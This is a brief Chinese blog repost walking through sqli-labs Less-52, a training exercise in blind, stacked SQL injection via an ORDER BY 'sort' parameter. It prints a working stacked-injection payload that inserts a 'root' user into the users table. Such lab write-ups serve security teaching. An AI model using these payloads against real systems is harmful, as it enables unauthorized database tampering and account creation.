您的位置: 首页  >  IT文章  >  Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)

Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)

分类: IT文章 2022-07-26 16:04:23

1.出错别关闭了

  ?sort=1'

  Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)

2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1;insert into users(id,username,password) value (20,'root','root')       

      Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)

3.也可以用盲注

原文链接:https://www.cnblogs.com/omnis/p/8392574.html

相关推荐